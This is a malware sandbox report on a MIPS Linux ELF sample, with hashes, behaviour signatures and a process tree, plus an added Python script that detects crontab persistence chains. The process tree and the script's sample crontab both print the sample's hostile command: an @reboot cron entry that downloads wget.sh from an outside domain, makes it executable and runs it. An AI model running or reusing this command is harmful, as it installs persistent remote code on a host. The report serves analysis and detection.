Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    28-10-2024 01:07

General

  • Target

    0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf

  • Size

    99KB

  • MD5

    2bc1855eb4297c28116e412b6705e14a

  • SHA1

    4d8189399c887b335e1d690961e38b806948d9cd

  • SHA256

    0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad

  • SHA512

    1074aa161b94e13c473e8cf23d6bbd6baa531854b4c110b8142ccd8e8296b6a94751e55907f9ed6aff7d1b470676c81ea5754fdfeef14f8829dc9a5e3452d26e

  • SSDEEP

    1536:uo6JSd6vTfjZ0IonWnP4MmBGSBGxJGSnuqMLHRvMNswe+fYgHIRyyR:upP5ld4MaqMjRUKuYRyyR

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 16 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
    /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:705
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:709
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:712
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:713
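The persistence chain in the process tree above (an @reboot crontab entry that changes into /tmp, fetches wget.sh from hailcocks.ru with wget and then curl, chmods it 777 and runs it) is a pattern worth hunting for on other hosts. The following Python script is an added example, not part of the sandbox report: it parses crontab text, checks each entry against the links of that chain, and reports entries that match at least two of them. The sample crontab it runs over is constructed for illustration; only its @reboot line reproduces the command the report shows being piped into `crontab -`, and the actual contents of the tmp.22OlBk spool file are not shown on the page.

```python
"""Triage helper: flag crontab entries that match the persistence chain seen in
the process tree (@reboot -> cd to scratch dir -> wget/curl a script -> chmod -> run).

Added example, not part of the sandbox report. The crontab text below is
constructed; the third entry reproduces the command line the report shows being
written with `crontab -`, the other entries are benign filler.
"""
import re
from dataclasses import dataclass, field
from typing import List

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
URL_RE = re.compile(r"https?://[^\s'\"<>;|&]+")
SPECIAL_SCHEDULE_RE = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|hourly)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(\S+)")
RELATIVE_EXEC_RE = re.compile(r"(?:^|[\s;&|(])\./\S+")

SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
*/5 * * * * /usr/local/bin/backup.sh
"""


@dataclass
class CronEntry:
    lineno: int
    schedule: str   # five-field time spec or an @reboot-style keyword
    command: str


@dataclass
class Finding:
    entry: CronEntry
    indicators: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A lone @reboot (e.g. starting a local service) is common and benign;
        # require at least two links of the download-and-execute chain.
        return len(self.indicators) >= 2


def parse_crontab(text: str) -> List[CronEntry]:
    """Parse `crontab -l` style output; skips comments, blanks and VAR=value lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if SPECIAL_SCHEDULE_RE.match(line):
            parts = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry: needs five time fields plus a command
            parts = [" ".join(fields[:5]), fields[5]]
        if len(parts) == 2:
            entries.append(CronEntry(lineno, parts[0], parts[1]))
    return entries


def _makes_executable(cmd: str) -> bool:
    """True if any chmod in the command sets an execute bit (octal or symbolic mode)."""
    for mode in CHMOD_RE.findall(cmd):
        if re.fullmatch(r"[0-7]{3,4}", mode):
            if int(mode, 8) & 0o111:
                return True
        elif re.search(r"\+[rwxst]*x", mode):
            return True
    return False


def assess(entry: CronEntry) -> Finding:
    """Collect the chain indicators present in one entry."""
    f = Finding(entry)
    cmd = entry.command
    if entry.schedule == "@reboot":
        f.indicators.append("runs at every boot")
    f.urls = list(dict.fromkeys(URL_RE.findall(cmd)))  # de-duplicated, order kept
    if f.urls and re.search(r"\b(wget|curl)\b", cmd):
        f.indicators.append("fetches payload over HTTP")
    if _makes_executable(cmd):
        f.indicators.append("chmod sets execute bit")
    if any(re.search(re.escape(d) + r"(?=[/\s;|&]|$)", cmd) for d in SCRATCH_DIRS):
        f.indicators.append("works in world-writable scratch dir")
    if RELATIVE_EXEC_RE.search(cmd):
        f.indicators.append("executes a relative-path script")
    return f


def scan(text: str) -> List[Finding]:
    """Return only the entries that cross the suspicion threshold."""
    return [f for f in map(assess, parse_crontab(text)) if f.suspicious]


if __name__ == "__main__":
    for f in scan(SAMPLE_CRONTAB):
        print(f"line {f.entry.lineno} [{f.entry.schedule}] {', '.join(f.indicators)}")
        for u in f.urls:
            print(f"  url: {u}")
```

Run it over the output of `crontab -l` for each user, or directly over the files under /var/spool/cron/crontabs, which is where the report shows the new crontab being written. The two-indicator threshold keeps an ordinary @reboot service start from being flagged while still catching a download-and-run chain even if the attacker drops the @reboot keyword in favour of a five-field schedule.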

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.22OlBk

    Filesize

    306B

    MD5

    7f870874f6e2e8a519bfb12fd9595bae

    SHA1

    a06aa499becd5f448356d6dcd76441142f5f4142

    SHA256

    09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d

    SHA512

    f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620